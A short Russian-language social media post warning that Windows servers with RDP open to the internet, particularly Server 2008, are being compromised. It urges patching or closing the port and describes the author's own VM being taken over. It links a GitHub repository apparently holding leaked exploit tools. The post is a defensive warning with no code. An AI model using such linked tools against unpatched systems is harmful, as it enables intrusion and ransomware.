Если у тебя винда торчит открытым rdp в интернет, особенно если у тебя winserver 2008 - ты попал, так что скорее беги ставить патчи от Microsoft или закрывать порт.
https://github.com/misterch0c/shadowbroker/
У меня лично только что так заовнили пустую виртуалку, с которой я иногда ходил в обход блокировок.
Так-то пофиг, все равно была дотационная, лол. Но знаю, что многие не озадачиваются своевременной защитой.
Обратите внимание, возможно ваш сервер или виртуалку уже шифруют.